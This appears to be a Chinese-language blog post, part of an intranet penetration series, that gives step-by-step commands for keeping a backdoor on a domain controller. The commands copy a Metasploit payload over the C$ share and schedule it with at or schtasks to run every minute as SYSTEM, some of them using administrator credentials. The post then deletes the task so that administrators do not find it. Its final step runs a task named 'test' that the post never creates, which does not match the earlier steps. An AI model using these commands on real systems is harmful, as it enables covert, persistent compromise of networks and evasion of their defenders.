内网渗透专题(六)


计划任务

为了使后门更加持久化,我们使用计划任务,定时上线木马。

我们可以通过at命令通过跳板机在目标主机DC上创建计划任务,让计算机在指定的时间执行木马程序,从而获得对内网目标主机的控制。

利用at命令具体实现:

使用net time命令确定目标主机DC的当前时间:

net time \\192.168.183.130(主机IP)

然后使用copy命令远程操作,将metasploit生成的payload文件复制到目标系统C盘中:

copy shell.exe \\192.168.183.130\c$

接着使用at命令创建计划任务,让目标主机DC在指定的时间运行metasploit木马程序:

at \\192.168.183.130 18:53:00 c:\shell.exe

最后,我们使用完计划任务后,还需要将该计划任务删除,以免被网管理员发现:

at \\192.168.183.130 1 /delete
// 1为计划任务的ID

利用 schtasks 命令具体实现:

at命令已经被Windows Vista、Windows Server 2008及之后版本的操作系统废弃了,代替他的是schtasks命命令。schtasks命令比at命令更为灵活、自由。

  1. 使用copy命令远程操作,将metasploit生成的payload文件shell.exe复制到目标系统C盘中。

  2. 在目标主机DC上创建一个名称为“backdoor”的计划任务。该计划任务每分钟启动一次,启动程序为我们之前到C盘下的shell.exe,启动权限为system。命令如下:

    schtasks /create /s 192.168.183.130 /tn backdoor /sc minute /mo 1  /tr c:\shell.exe /ru system /f

    在没有建立ipc连接时,要加上/u和/p参数分别设置用户名和密码。有些时候,由于当前权限或组策略设置等原因,该schtasks方法远程创建计划任务可能会报错拒绝访问。

    遇到这种情况,我们可以加上/u和/p参数分别设置高权限用户名和密码,如下:

    schtasks /create /s 192.168.183.130 /u administrator /p Liu78963 /tn backdoor /sc minute /mo 1 /tr c:\shell.exe /ru system /f
  3. 然后执行如下命令立即运行该计划任务

    schtasks /run /s 192.168.183.130 /i /tn backdoor # i:忽略任何限制立即运行任务schtasks 
    /run /s 192.168.183.130 /i /tn backdoor /u administrator /p Liu78963   # 遇到上面所说的报错时执行加上/u和/p参数分别设置高权限用户名和密码
  4. 计划任务成功运行后,执行如下命令强制删除该计划任务:

    schtasks /delete /s 192.168.183.130 /tn "backdoor" /f
  5. 立即启动该计划任务:

    schtasks /run /s 192.168.183.130 /i /tn test

文章作者: 小小星仔
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 小小星仔 !
评论
  目录